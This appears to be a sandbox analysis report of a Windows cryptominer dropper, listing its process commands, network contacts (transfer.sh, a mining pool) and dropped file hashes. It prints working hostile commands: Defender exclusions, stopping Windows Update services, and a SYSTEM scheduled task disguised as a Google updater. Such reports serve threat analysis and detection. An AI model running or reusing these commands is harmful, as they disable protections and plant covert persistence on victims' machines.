C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
NL 209.250.248.11:33522 tcp
US 8.8.8.8:53 11.248.250.209.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 2.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e4fj3mg0.2fu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

C:\Windows\System32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68
